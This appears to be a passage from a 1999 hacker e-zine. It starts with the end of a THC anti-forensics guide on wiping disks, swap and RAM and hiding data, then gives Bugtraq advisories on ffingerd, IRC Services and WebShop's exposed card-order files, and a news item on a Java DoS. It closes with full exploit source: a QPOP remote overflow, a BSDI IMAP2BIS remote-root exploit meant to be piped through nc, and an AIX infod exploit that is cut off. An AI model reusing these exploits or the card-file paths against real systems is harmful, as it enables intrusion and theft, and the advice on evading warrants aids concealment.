create problems when at this moment this space is needed by an important application. At least when the system shuts down, sfill should be called.
Put this in the "stop" part of a late rc2.d script:
sfill -llf /tmp 2> /dev/null
sfill -llf /var/spool 2> /dev/null
Note that it is a good idea to generate a new paritition for /tmp itself, and putting a symlink from /usr/tmp and /var/tmp to /tmp. This way it is easier to control and
wipe.
Again, if you can't install the secure_delete package for any reason, you can also use this solution (slower and not as secure):
dd if=/dev/zero of=/tmp/cleanup
sync
rm /tmp/cleanup
*** 3. How to handle swap data
Securely wiping files and free diskspace - well what's left? Today, harddisk MB's are cheaper than RAM, thats why swap space is used to expand the available
RAM. This is in reality a file or partition on your harddisk. And can have your sensitive data in it.
Again there is only one tool which helps you out here, "sswap" from THC's secure_delete package ;-)
Put this line after the "swapoff" line in /sbin/init.d/halt:
sswap -l /dev/XXXX # the device for your swap, check /etc/fstab
*** 4. How to handle RAM
In section V.5 I wrote about sensitive information in your RAM, the fast memory of your computer system. It can hold very sensitive information like the email you
wrote before pgp'ing it, passwords, anything.
To ensure, that the memory is cleaned, use the smem utility.
It should be called like this in the stop part of a late rc2.d script (as already mentioned above), after the wiping the file of /tmp etc. and then wiping the free memory:
smem -ll
*** 5. Temporary data - it is evil
After you have secured/anonymized/privatized your system so far everything's ready - or did you forget something?
Remember what we told you in section VI.1, that temporary data is written somewhere and sometimes you don't know. If you are unlucky, all we've done here was
useless. We have to ensure that there's no temporary data left on the devices and that it can't be recovered either.
We already dealed with /var/log, /var/run and sent email (/var/spool/...), and we wipe all free diskspace from our temporary disk locations. Now we must wipe also
the temporary data.
Put this line in the stop part of a late rc2.d script (before sfill from VI.3):
( cd /tmp ; ls -A | xargs -n 250 srm -r ; )
Also a $USER/tmp directory should be created for all users under the CFS /home protection and a TMPDIR variable set to this directory.
See section IX. for all these scripts ...
* VII. NETWORK CONNECTIONS
This is a very specialized area of this document. I write here a few ways how someone can protect some of their data being transfered on the internet.
The basic prerequisites are as following: You've got an external POP3 and SMTP (mail relayer) where you get and send your email. When your go on irc, you also
don't like your real hostname being printed on the channels.
Your external mail server should be in another country, because if maybe some official agencies think you're doing something illegal (and I'm sure you won't) it's
harder to get a search warrant. It's also harder because companies or individuals that try to get your data would need to invest more time, work and money to get it.
You can tunnel your SMTP and POP3 via ssh to the external mail server.
For POP3 this is easy, but for SMTP this is a bit harder.
Just as an example, irc traffic can be tunneled through this as well, but dcc stuff won't work (one way doesn't work, the other would reveal your ip address to the
sender and the data is not encrypted on any part of the internet)
Note that you can also use redirectors and proxies to accomplish further redirecting for other protocols (www, irc, ftp proxies etc.)
Thats all. All mail traffic (and as you can see below, irc traffic too) is being crypted between you and your mail/proxy server.
sendmail.cf (important parts):
DSsmtp:[127.0.0.1]
DjTHE_DOMAIN_NAME_OF_YOUR_EMAIL
DMTHE_DOMAIN_NAME_OF_YOUR_EMAIL
- Msmtp, P=[IPC], F=mDFMuX, S=11/31, R=21, E=\r\n, L=990,
+ Msmtp, P=[IPC], F=mDFMuXk, S=11/31, R=21, E=\r\n, L=990,
(add the "k" switch to the smtp option config line)
~user/.fetchmailrc:
poll localhost protocol POP3:
user USER_REMOTE with pass PASSWORD_REMOTE is USER_LOCAL here
mda "/usr/sbin/sendmail -oem USER_LOCAL"
(enter the corresponding USER_* and PASSWORD in here)
The ssh commandline which tunnels the traffic for POP3, SMTP and irc:
ssh -a -f -x -L 110:localhost:110 -L 6667:irc.server.com:6667 -L \
25:localhost:25 your_mail_server.com
That's all. I won't tell you more. Use your brain ;-)
* VIII. HIDING PRIVACY SETTINGS *** 1. Mount is your friend
Take a look at the following commands:
# ls -l /home
total 3
drwxr-x--- 1 root root 1024 Mar 28 14:53 admin
drwxr-x--- 1 vh thc 1024 Mar 28 16:22 vh
drwxr-x--- 1 user users 1024 Mar 28 11:22 user
# mount -t ext2 /dev/hda11 /home # or a ramdisk, doesn't matter
# ls -l /home
total 0
# : whoops, where are the homedirs ?
# umount /home
# ls -al /home
total 3
drwxr-x--- 1 root root 1024 Mar 28 14:53 admin
drwxr-x--- 1 vh thc 1024 Mar 28 16:22 vh
drwxr-x--- 1 user users 1024 Mar 28 11:22 user
# : ah, yeah there they are again ...
This is a nice feature to hide your crypted data and binaries. Just put your files into e.g. /usr/local/bin and /usr/local/crypt and mount a decoy filesystem over
/usr/local. If you then have got a process started in your boot scripts which opens a file on the decoy filesystem, the filesystem can't be unmounted until the process is
killed. This way, it's much harder for someone to detect your data!
*** 2. Removable Medias
An even better possibility is: put all your sensitive data on a removable media. Put your media in, mount it, it run the startscript from it to activate all the privacy stuff.
This way you made it one step harder for someone to get to know whats going on.
*** 3. ???
Any other ideas? Think about it! (and maybe send me your ideas ;-)
* IX. EXAMPLE CONFIGURATION AND SCRIPTS
Click here to download the anonymous-unix-0.7.tar.gz tools!
* X. FINAL COMMENTS
*** 1. Where to get the tools mentioned in this text
- Crypto Filesystems
CFS (Cryptographic File System) http://www.replay.com
TCFS (Transparent CFS) ftp://mikonos.dia.unisa.it/pub/tcfs/
SFS (Stegano File System) http://www.linux-security.org/sfs
Crypto Loopback Filesystem ftp://ftp.csua.berkeley.edu/pub/cypherpunks/filesystems/linux/
- Tools
THC's secure_delete package http://www.infowar.co.uk/thc
secure-linux kernel patch http://www.false.com/security
syslog-ng http://www.balabit.hu/products/syslog-ng.htm
ssylog http://www.core-sdi.com/ssyslog
- The example Linux Distribution
SuSE Linux Distribution http://www.suse.com
*** 2. Additional thoughts
The following problems are still present:
- If an attacker can gain access to the system without rebooting and in time before data is wiped, unmounted, etc. these countermeasures are worthless.
- If a really well funded organisation is trying to decrypt your data via brute force/dictionary or good electronic microscopes and technical staff with excellent
knowhow, your wiping won't help you very much.
- The solution for /var/spool/mail and /var/spool/mqueue etc. is far away from being perfect. Remember this. Ideas welcome.
- The configuration of your system daemons can only be secured if you are present at the console after a reboot. That's the price.
- It is not very hard to detect the privacy stuff done. This might bring you in trouble in countries like China or Iran. Removable medias might help, or try a
crypto filesystem with stegano support.
Secure your system against unauthorized (from your point of view) access and use strong passwords.
*** 3. Greetings (what would the world be without greets?)
What would the world be without love and greetings? ;-)
Greets to individuals (in alphabetic order):
Doc Holiday, Froody, Fyodor, plasmoid, pragmatic, rookie, Solar Designer, Tick, Wilkins.
Greets to groups:
ADM, THC (of course ;-) and arF
Greets to channel members:
#bluebox, #hack, #hax, #!adm and #ccc
*** 4. How to contact me for updates or comments
Please send me any further ideas you've got to make this documentation better! Did I wrote bad bad english in some part? Could I rephrase parts to make it easier
to understand? What is wrong? What's missing? van Hauser / THC - [The Hacker's Choice]
THC's Webpage -> http://r3wt.base.org
(or http://thc.pimmel.com or http://www.infowar.co.uk/thc)
Type Bits/KeyID Date User ID
pub 2048/CDD6A571 1998/04/27 van Hauser / THC <vh@reptile.rug.ac.be>
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3i
mQENAzVE0A4AAAEIAOzKPhKBDFDyeTvMKQ1xx6781tEdIYgrkrsUEL6VoJ8H8CIU
SeXDuCVu3JlMKITD6nPMFJ/DT0iKHgnHUZGdCQEk/b1YHUYOcig1DPGsg3WeTX7L
XL1M4DwqDvPz5QUQ+U+VHuNOUzgxfcjhHsjJj2qorVZ/T5x4k3U960CMJ11eOVNC
meD/+c6a2FfLZJG0sJ/kIZ9HUkY/dvXDInOJaalQc1mYjkvfcPsSzas4ddiXiDyc
QcKX+HAXIdmT7bjq5+JS6yspnBvIZC55tB7ci2axTjwpkdzJBZIkCoBlWsDXNwyq
s70Lo3H9dcaNt4ubz5OMVIvJHFMCEtIGS83WpXEABRG0J3ZhbiBIYXVzZXIgLyBU
SEMgPHZoQHJlcHRpbGUucnVnLmFjLmJlPokAlQMFEDVE0D7Kb9wCOxiMfQEBvpAD
/3UCDgJs1CNg/zpLhRuUBlYsZ1kimb9cbB/ufL1I4lYM5WMyw+YfGN0p02oY4pVn
CQN6ca5OsqeXHWfn7LxBT3lXEPCckd+vb9LPPCzuDPS/zYnOkUXgUQdPo69B04dl
C9C1YXcZjplYso2q3NYnuc0lu7WVD0qT52snNUDkd19ciQEVAwUQNUTQDhLSBkvN
1qVxAQGRTwgA05OmurXHVByFcvDaBRMhX6pKbTiVKh8HdJa8IdvuqHOcYFZ2L+xZ
PAQy2WCqeakvss9Xn9I28/PQZ+6TmqWUmG0qgxe5MwkaXWxszKwRsQ8hH+bcppsZ
2/Q3BxSfPege4PPwFWsajnymsnmhdVvvrt69grzJDm+iMK0WR33+RvtgjUj+i22X
lpt5hLHufDatQzukMu4R84M1tbGnUCNF0wICrU4U503yCA4DT/1eMoDXI0BQXmM/
Ygk9bO2Icy+lw1WPodrWmg4TJhdIgxuYlNLIu6TyqDYxjA/c525cBbdqwoE+YvUI
o7CN/bJN0bKg1Y/BMTHEK3mpRLLWxVMRYw==
=MdzX
-----END PGP PUBLIC KEY BLOCK-----
@HWA
22.0 Ffingerd vulnerability
~~~~~~~~~~~~~~~~~~~~~~
Date: Fri, 23 Apr 1999 19:26:13 +0300
From: Eilon Gishri <eilon@ARISTO.TAU.AC.IL>
To: BUGTRAQ@netspace.org
Subject: Ffingerd privacy issues
Hi,
I found a couple of bugs in ffingerd 1.19 which are related to
privacy.
Here goes:
The permission on root's home directory are now 700 (/home/root).
-----
(aristo)/cc/eilon>finger root@host.domain
[host.domain]
Login: root Name: #6
No project.
No plan.
No public key.
-----
A lesson in how not to be seen. On host.domain, the user doesn't want
to be seen (please stand up :)). Too bad, his/her home directory's
permissions (which says 'I want some privacy') makes ffingerd state
otherwise. Ffingerd looks for the file .nofinger in the user's home
directory but due to the current state of permissions on it, it can't
be accessed thus "there is no such file" and there for is happy to
supply us with the user's information.
-----
# cd ~root
# ls -l .nofinger
-rw-r--r-- 1 root system 0 Apr 23 18:01 .nofinger
# ls -ld .
drwx------ 5 root system 512 Apr 23 18:01 .
# chmod 755 .
-----
Now lets try again.
-----
(aristo)/cc/eilon>finger root@host.domain
[host.domain]
That user does not want to be fingered
-----
Hmmm, now for an unknown user.
-----
(aristo)/cc/eilon>finger root1@host.domain
[host.domain]
That user does not want to be fingered.
-----
Oops. Notice the dot ('.') at the end of the sentence. A very simple
and efficient way to find whether the user exists on the remote host
or not (taking into account the fact that ffingerd has been installed
on the remote host).
Attached here a patch to fix those problems.
--
Eilon Gishri eilon@aristo.tau.ac.il
Security Consultant Office: +972-3-6406723
Israel Inter University Computation Center Fax: +972-3-6409118
/* On a matter of national security */ Home: +972-3-5078671
[ Part 1.2, Text/PLAIN 20 lines. ]
--- ffingerd.c.old Thu Feb 18 12:50:36 1999
+++ ffingerd.c Fri Apr 23 18:48:54 1999
@@ -134,7 +134,7 @@
setgid(pwd->pw_gid);
setuid(pwd->pw_uid);
sprintf(filename,"%.200s/.nofinger",pwd->pw_dir);
- if (lstat(filename,&stat_buf)) {
+ if((lstat(filename,&stat_buf) == -1) && (errno == ENOENT)) {
#ifndef NO_SYSLOG
#ifdef FASCIST_LOGGING
char message[512];
@@ -154,7 +154,7 @@
dump_file(filename,"Public key:","No public key.");
} else {
char message[512];
- puts("That user does not want to be fingered");
+ puts("That user does not want to be fingered.");
#ifndef NO_SYSLOG
sprintf(message,"attempt to finger \"%.200s\" from %.200s\n",pwd->pw_name,remote);
syslog(LOG_FACILITY,"%s",message);
------------------------------------------------------------------------------
Date: Fri, 23 Apr 1999 19:43:33 +0200
From: Felix von Leitner <leitner-bugtraq@MATH.FU-BERLIN.DE>
To: BUGTRAQ@netspace.org
Subject: Re: Ffingerd privacy issues
Thus spake Eilon Gishri (eilon@aristo.tau.ac.il):
> I found a couple of bugs in ffingerd 1.19 which are related to
> privacy.
OK. I would be happy if you email me (the author) first before
publishing this on bugtraq. Next time, maybe.
[ffingerd assumes the user wants to be fingered if his home does not
give public execute access]
This is documented in ffingerd. If you want ffingerd to look into
protected homes, run it as root.
> -----
> (aristo)/cc/eilon>finger root@host.domain
> [host.domain]
> That user does not want to be fingered
> -----
> Hmmm, now for an unknown user.
> -----
> (aristo)/cc/eilon>finger root1@host.domain
> [host.domain]
> That user does not want to be fingered.
> -----
> Oops. Notice the dot ('.') at the end of the sentence. A very simple
> and efficient way to find whether the user exists on the remote host
> or not (taking into account the fact that ffingerd has been installed
> on the remote host).
This has been pointed out to me yesterday. I fixed it today (before I
saw this message, by the way), and announced version 1.20 on Freshmeat
pointing out this fixed problem. Did you see my announcement and then
posted to bugtraq?
> --- ffingerd.c.old Thu Feb 18 12:50:36 1999
> +++ ffingerd.c Fri Apr 23 18:48:54 1999
> @@ -134,7 +134,7 @@
> setgid(pwd->pw_gid);
> setuid(pwd->pw_uid);
> sprintf(filename,"%.200s/.nofinger",pwd->pw_dir);
> - if (lstat(filename,&stat_buf)) {
> + if((lstat(filename,&stat_buf) == -1) && (errno == ENOENT)) {
> #ifndef NO_SYSLOG
> #ifdef FASCIST_LOGGING
> char message[512];
This is debatable.
If a user wants privacy, he should remove the world readable permission,
not the world executable permission.
I will not add this right now but think it over. If anyone wants to
comment on the way to go here, feel free to email me. I would prefer
discussion this in private email than on bugtraq, but if you must, I
will also read bugtraq comments.
> @@ -154,7 +154,7 @@
> dump_file(filename,"Public key:","No public key.");
> } else {
> char message[512];
> - puts("That user does not want to be fingered");
> + puts("That user does not want to be fingered.");
> #ifndef NO_SYSLOG
> sprintf(message,"attempt to finger \"%.200s\" from %.200s\n",pwd->pw_name,remote);
> syslog(LOG_FACILITY,"%s",message);
This has already been fixed.
Felix
------------------------------------------------------------------------------
Date: Fri, 23 Apr 1999 22:00:08 +0300
From: Eilon Gishri <eilon@ARISTO.TAU.AC.IL>
To: BUGTRAQ@netspace.org
Subject: Re: Ffingerd privacy issues
On Fri, Apr 23, 1999 at 07:43:33PM +0200, Felix von Leitner wrote:
> Thus spake Eilon Gishri (eilon@aristo.tau.ac.il):
> > I found a couple of bugs in ffingerd 1.19 which are related to
> > privacy.
>
> OK. I would be happy if you email me (the author) first before
> publishing this on bugtraq. Next time, maybe.
I've e-mailed you and Cc-ed BugTraq. As my email includes a fix (A
very complicated one I must say :)) I also notified the list. I'm
not sure I would have done the same if I couldn't fix it myself.
> [ffingerd assumes the user wants to be fingered if his home does not
> give public execute access]
Huh, It's opened if it's closed ?
> This is documented in ffingerd. If you want ffingerd to look into
> protected homes, run it as root.
I want the machine itself to be protected and not only the users home
directory. I consider it a feature when I don't have to run fingerd
as root. Please don't consider it as a flame, I do like this utility
and am using it.
> > -----
> > (aristo)/cc/eilon>finger root@host.domain
> > [host.domain]
> > That user does not want to be fingered
> > -----
>
> > Hmmm, now for an unknown user.
>
> > -----
> > (aristo)/cc/eilon>finger root1@host.domain
> > [host.domain]
> > That user does not want to be fingered.
> > -----
>
> > Oops. Notice the dot ('.') at the end of the sentence. A very simple
> > and efficient way to find whether the user exists on the remote host
> > or not (taking into account the fact that ffingerd has been installed
> > on the remote host).
>
> This has been pointed out to me yesterday. I fixed it today (before I
> saw this message, by the way), and announced version 1.20 on Freshmeat
> pointing out this fixed problem. Did you see my announcement and then
> posted to bugtraq?
Nope. I was playing with it on a machine which I would like to see all
fingers which are done to it without giving away any "free" information
> This is debatable.
> If a user wants privacy, he should remove the world readable permission,
> not the world executable permission.
I disagree.
> I will not add this right now but think it over. If anyone wants to
> comment on the way to go here, feel free to email me. I would prefer
> discussion this in private email than on bugtraq, but if you must, I
> will also read bugtraq comments.
--
Eilon Gishri eilon@aristo.tau.ac.il
Security Consultant Office: +972-3-6406723
Israel Inter University Computation Center Fax: +972-3-6409118
/* On a matter of national security */ Home: +972-3-5078671
------------------------------------------------------------------------------
Date: Fri, 23 Apr 1999 15:46:59 -0500
From: Dagmar d'Surreal <dagmar@EDGE.NET>
To: BUGTRAQ@netspace.org
Subject: Re: Ffingerd privacy issues
Parts/Attachments:
1 Shown 36 lines Text
2 OK 1.4 KB Application, ""
----------------------------------------
As to the matter of the home directories being
world-readable/executeable...
Having the finger daemon assume that there is no .nofinger file because
the home directory in question is not readable, but still executeable,
breaks a few things. On multi-user machines, some users will be extremely
paranoid, and will not wish to use anything BUT mode 700, because having
the directory world-executeable will allow other users on the system to
detect the presence of certain files in their directory (like .rhosts,
.forward, .promcail, .pinerc) that may allow them to launch attacks at
that particular user, knowing that there's a good chance that the user
uses a vulnerable package, and quite possibly even the last time they used
it depending on the file.
After seeing the post on freshmeat, it occurred to me that I had forgotten
to email Felix the patch for 1.18 that took care of the punctuation as
well as a few other issues, and I now notice that I sent him the wrong
version of the patch this morning anyway. (A version which did not have
the directory mode issue fixed, but at least my binary has been working
all this time thankfully.) Eilon Gishri dealt with it a lot more
elegantly than I did anyway. ;)
Attached is a patch which applies to the 1.20 version of Fefe's Finger
Daemon, which includes both Eilon Gishri's patches to deal with paranoid
users whose home directories are mode 700 (the punctuation problem had
already been fixed in 1.20), and my misdirection patches that
add the .fakefinger (lets users controly exactly what will be returned
when they are fingered) file use, and the /etc/ffingerd.empty and
/etc/ffingerd.indirect files which allow a sysadmin to change what kind of
message is sent to people when they try indirect or empty finger queries
without having to edit the source and recompile the daemon.
----------
Unsolicited commercial email sent to this address will be forwarded to
uce@ftc.gov, or responded to late in the evening after I've been clubbing
long enough to be fairly drunk, and at least twice as verbally abusive.
@HWA
22.0 DoS in IRC services
~~~~~~~~~~~~~~~~~~~
Date: Thu, 22 Apr 1999 22:53:42 EDT
From: Andy Church <achurch@DRAGONFIRE.NET>
To: BUGTRAQ@netspace.org
Subject: Bug in Services for IRC Networks 4.2.2
A bug has been found in versions through 4.2.2 of Services for IRC
Networks which allows any IRC user to crash the program. The channel
service's SET SUCCESSOR command does not properly handle the case of no
parameters, and generates a segmentation fault attempting to access
address zero. This bug is believed to be present in all versions since
the SET SUCCESSOR command was introduced (in version 4.1.0).
A new version, 4.2.3, has been released which fixes this bug. Users
of prior versions of Services should upgrade immediately.
Services updates are always announced on the Services mailing list;
see http://achurch.dragonfire.net/services/about.html for information on
subscribing to the list.
--Andy Church
achurch@dragonfire.net
http://achurch.dragonfire.net/
@HWA
23.0 The big e-commerce crunch. Several web shopping carts are still wide open;
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Thu, 22 Apr 1999 13:09:32 -0400
From: Elaich Of Hhp <hhp@NS.SUSPEND.NET>
To: BUGTRAQ@netspace.org
Subject: WebShop advisory.
(hhp) WebShop advisory. (hhp)
---------------------------------------------------------------------
Alright to my knowledge, there is another dangerous shop service
if installed the right way. I contacted the vendor and notified
the admin of the problem. I have the feeling this isnt all though.
I'm almost posotive there are more dangerous shopping services out
there that will be found very soon after all these posts get noticed.
So for now I will look around, please dont flood my email and i'll
repost if I find anything else.
Please remember this does not mean there is a flaw in the service
unless it is by defualt this is left readable on a clean instalation
with no configuration files to modify the permissions. Also PGP
options would illiminate most of the problems.
Also please note I did not install this software, the info I have
gathered was on the website and the vulnerable site was found by a
search engine.
Info:
WebShop via http://www.inetlab.com/products.html
Platforms: Windows 95/98/NT on Intel
Linux on Intel or Sparc
Solaris on Intel or Sparc
FreeBSD 2.2 or smaller on Intel
FreeBSD 3.0 on Intel
BSDI/OS on Intel............... (Found vuln server.)
Silicon Graphics Irix on MIPS.. (Found vuln server.)
Executable: WebShop.cgi
Exposed Directory: WebShop or webshop
Exposed Order info: WebShop/templates/cc.txt
and or WebShop/logs/cc.txt and ck.log
Status: Free?, resale=$50?.
Number of exposed installs found: 2+
PGP Option available?: Unknown.
elaich - 4:16:15CST 4/22/1999
--------------------------------------------
elaich of the hhp.
Email: hhp@hhp.hemp.net / pigspigs@yahoo.com
Voice: 1800-Rag-on-gH pin: The-hhp-crew
Web: http://hhp.hemp.net
--------------------------------------------
@HWA
24.0 New Java bug unveils new Win9x DoS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Contributed by Astral http://www.403-security.com/
http://www.news.com/News/Item/0,4,35760,00.html
Java bug crashes Windows 95, 98
By Stephen Shankland
Staff Writer, CNET News.com
April 27, 1999, 5:30 p.m. PT
URL: http://www.news.com/News/Item/0,4,35760,00.html
A college student has found a glitch that enables a malicious Java program to crash Windows 95- or
98-based computers.
The bug uses Java to take advantage of a long-standing problem with Microsoft's Windows 95 and
Windows 98 operating systems, according to Joseph Ashwood, a computer research undergraduate student
at the University of Southern California. Specifically, it creates more and more computing processes,
called "threads," until the system runs out of resources.
"It generates so many threads that the system loses all control over itself," Ashwood said.
Such a malicious Java program could be embedded on a Web page, according to Ashwood, who said he came
across the bug when he was looking at the Java source code for a computer security class.
Sun and Microsoft acknowledged the problem, but said that "denial of service" attacks such as Ashwood's
thread-overrun program are common and that protecting against them is difficult.
The Java thread-overrun program is interesting in light of the fact that the malicious program crashes
Windows 95 and 98 computers without ever leaving the Java "sandbox" that's designed to curtail Java
programs so they can't wreak havoc on an operating system. More robust operating systems such as Windows
NT or Sun's Solaris aren't troubled by the bug.
A Microsoft spokesperson said the company is considering addressing the threading weakness, but that
the problem is deeply buried in the operating system architecture and that modifying the relevant code
would require "a major overhaul." Indeed, one of the reasons for developing Windows NT was because of the
need for a more robust threading architecture, the spokesperson said.
Microsoft also encouraged users to be careful which Web sites they visit and what software they download.
The malicious program has crashed Windows 95 and Windows 98 systems with both Microsoft's Internet
Explorer and Netscape Navigator Web browsers, Ashwood said. In some circumstances, Navigator crashes but
the system doesn't, he said.
Ashwood discovered the bug looking at a previous versions of Java, but he's found that it operates with
the most recent version as well.
In his tests, Ashwood has found that Windows NT performance degrades and the browser stops responding.
On Unix systems, the browser hangs up, he said.
From a programming point of view, it's difficult to fix a problem like this one, which takes advantage
of the overuse of an ordinary activity such as generating a new thread, said Roland Jones, senior product
manager for Java security.
"What's doing this is a normal operation taken to excess. It's really hard to tell what's normal and
what's excessive," Jones said.
Creating threads is as basic to computers as eating is to people, but in this case, "The waitress can't
tell that this guy has ordered 47 steaks already."
Ashwood contended "it should be rather simple for either Microsoft or Sun to fix it" by counting and
limiting the threads. He added that it would be most logical for Microsoft to fix it, because the thread
issue is a vulnerability that's not limited just to Java.
The Java-based thread-overrun program runs inside the Java virtual machine, the software component that
lets programs written in Java execute on all sorts of different chips.
The thread overrun issue "could be addressed in the virtual machine. We have some thoughts about what
we can do. But we haven't had that much trouble with it," Jones said. "It's one of the things that's been
on our list to look at."
"The better operating system should be able to handle this," he added .
Ashwood said he notified Sun about the exploit in September, October, and November, and was dissatisfied
with the company's responses. Last week, he described the bug on the Alienware Web site.
@HWA
25.0 QPOP (version 2.4b2) _demonstration_ REMOTE exploit for FreeBSD 2.2.5.and BSDi 2.1
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/*
* QPOP (version 2.4b2) _demonstration_ REMOTE exploit for FreeBSD 2.2.5.
* and BSDi 2.1
* 24-Jun-1998 by stran9er
*
* Based:
* FreeBSD/BSDi shellcode from some bsd_lpr_exploit.c by unknown author.
* x86 decode.bin/encode.c by Solar Designer.
*
* Disclaimer:
* this demonstration code is for educational purposes only! DO NOT USE!
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define ESP 0xefbfd480
#define BMW 750
main(int argc, char **argv)
{
int i,t,offset = 500;
char buf[1012];
char nop[] = "\x91\x92\x93\x94\x95\x96\x97\xF8\xF9\xFC\xFD";
char decode_x86[] =
"\x68\x5D\x5E\xFF\xD5\xFF\xD4\xFF\xF5\x8B\xF5\x90\x66\x31\x7D\x30"
"\x33\x7D\x30\x90\x90\x8B\xC7\x66\x2D\x5D\x5D\xD5\x21\x8B\xFD\x83"
"\xC7\x02\x8B\xEF\x90\x90\x90\x8A\xE0\x8B\xFE\x83\xC6\x01\x32\x67"
"\x30\x30\x67\x30\x90\x75\xD5";/*\x79\x5F\x7D\x60\x5D\x63\x70\x5E"*/
char shellcode_BSDi[] =
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
fprintf(stderr, "QPOP (FreeBSD v 2.4b2) remote exploit by stran9er. - DO NOT USE! -\n");
if (argc>1) offset = atoi(argv[1]);
fprintf (stderr,"Using offset %d (esp==0x%x)",offset,ESP);
offset+=ESP;
fprintf (stderr," esp+offset=0x%x\n\n",offset);
for(i=0;i<sizeof(buf);i++) buf[i]=nop[random()%strlen(nop)];
// memset(buf, 0x90, sizeof(buf));
buf[sizeof(buf)-1]=0;
for(i=0;i < (sizeof(decode_x86)-1);i++) buf[i+BMW] = decode_x86[i];
for(t=0;t < sizeof(shellcode_BSDi);t++) {
buf[t*2+i+BMW+0] = (unsigned char)shellcode_BSDi[t] % 0x21 + 0x5D;
buf[t*2+i+BMW+1] = (unsigned char)shellcode_BSDi[t] / 0x21 + 0x5D;
}
buf[1008] = (offset & 0xff000000) >> 24;
buf[1007] = (offset & 0x00ff0000) >> 16;
buf[1006] = (offset & 0x0000ff00) >> 8;
buf[1005] = (offset & 0x000000ff);
printf("%s\n",buf);
}
/* -- CONFIDENTIAL -- */
@HWA
26.0 BSDI IMAP2BIS remote root exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/*
BSDI IMAP2BIS remote root exploit
Usage: (./imapx <offset>;cat)| nc targethost 143
where offset = -1000..1000 (brute force if 0 doesnt work)
Note:
if you plan to port this to other OS., make sure the
shellcode doesn't contain lower case chars since imapd
will toupper() the shellcode, thus fucking it up.
Note:
I tested this on a few system's and found this offsets vulnerable
*/
#include <stdio.h>
#include <stdlib.h>
#include <limits.h>
#include <string.h>
#define BUFLEN 4092
#define NOP 0x90
char shell[] =
"\xeb\x58\x5e"
"\x31\xdb\x83\xc3\x08\x83\xc3\x02\x88\x5e\x26"
"\x31\xdb\x83\xc3\x23\x83\xc3\x23\x88\x5e\xa8"
"\x31\xdb\x83\xc3\x26\x83\xc3\x30\x88\x5e\xc2"
"\x31\xc0\x88\x46\x0b\x89\xf3\x83\xc0\x05\x31"
"\xc9\x83\xc1\x01\x31\xd2\xcd\x80\x89\xc3\x31"
"\xc0\x83\xc0\x04\x31\xd2\x88\x56\x27\x89\xf1"
"\x83\xc1\x0c\x83\xc2\x1b\xcd\x80\x31\xc0\x83"
"\xc0\x06\xcd\x80\x31\xc0\x83\xc0\x01\xcd\x80"
"\x42\x49\x4e\x2f\x53\x48\x00";
void
main (int argc, char *argv[])
{
char buf[BUFLEN];
int offset,nop,i;
unsigned long esp;
char shell[1024+300];
fprintf(stderr,"usage: %s <offset>\n", argv[0]);
nop = 403;
esp = 0xefbfd5e8;
offset = atoi(argv[1]);
memset(buf, NOP, BUFLEN);
memcpy(buf+(long)nop, shell, strlen(shell));
for (i = 1024; i < BUFLEN - 3; i += 2)
{ *((int *) &buf[i]) = esp + (long) offset;
shell[ sizeof(shell)-1 ] = 0;
}
printf("{%d} AUTH\r\n", BUFLEN);
for (i = 0; i < BUFLEN; i++)
putchar(buf[i]);
printf("\r\n");
return;
}
@HWA
27.0 Infod AIX exploit
~~~~~~~~~~~~~~~~~
/* Infod AIX exploit (k) Arisme 21/11/98 - All Rights Reversed
Based on RSI.0011.11-09-98.AIX.INFOD (http://www.repsec.co
Run program with the login you want to exploit :)
When the window appears, select "options", "defaults", change printer
to something more useful (like /bin/x11/xterm) and print !
Comments,questions : arisme@altern.org */
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <pwd.h>
#define TAILLE_BUFFER 2000
#define SOCK_PATH "/tmp/.info-help"
#define PWD "/tmp"
#define KOPY "Infod AIX exploit (k) Arisme 21/11/98\nAdvisory RSI.0011.11-09-98.AIX.INFOD (http://www.repsec.com)"
#define NOUSER "Use : infofun [login]"
#define UNKNOWN "User does not exist !"
#define OK "Waiting for magic window ... if you have problems check the xhost "
void send_environ(char *var,FILE *param)
{ char tempo[TAILLE_BUFFER];
int taille;
taille=strlen(var);
sprintf(tempo,"%c%s%c%c%c",taille,var,0,0,0);
fwrite(tempo,1,taille+4,param);
}
main(int argc,char** argv)
{ struct sockaddr_un sin,expediteur;
struct hostent *hp;
struct passwd *info;
int chaussette,taille_expediteur,port,taille_struct,taille_param;
char buffer[TAILLE_BUFFER],paramz[TAILLE_BUFFER],*disp,*pointeur;
FILE *param;
char *HOME,*LOGIN;
int UID,GID;
printf("\n\n%s\n\n",KOPY);
if (argc!=2) { printf("%s\n",NOUSER);
exit(1); }
info=getpwnam(argv[1]);
if (!info) { printf("%s\n",UNKNOWN);
exit(1); }
HOME=info->pw_dir;
LOGIN=info->pw_name;
UID=info->pw_uid;
GID=info->pw_gid;
param=fopen("/tmp/tempo.fun","wb");
chaussette=socket(AF_UNIX,SOCK_STREAM,0);
sin.sun_family=AF_UNIX;
strcpy(sin.sun_path,SOCK_PATH);
taille_struct=sizeof(struct sockaddr_un);
if (connect(chaussette,(struct sockaddr*)&sin,taille_struct)<0)
{ perror("connect");
exit(1); }
/* 0 0 PF_UID pf_UID 0 0 */
sprintf(buffer,"%c%c%c%c%c%c",0,0,UID>>8,UID-((UID>>8)*256),0,0);
fwrite(buffer,1,6,param);
/* PF_GID pf_GID */
sprintf(buffer,"%c%c",GID>>8,GID-((GID>>8)*256));
fwrite(buffer,1,2,param);
/* DISPLAY (259) */
bzero(buffer,TAILLE_BUFFER);
strcpy(buffer,getenv("DISPLAY"));
fwrite(buffer,1,259,param);
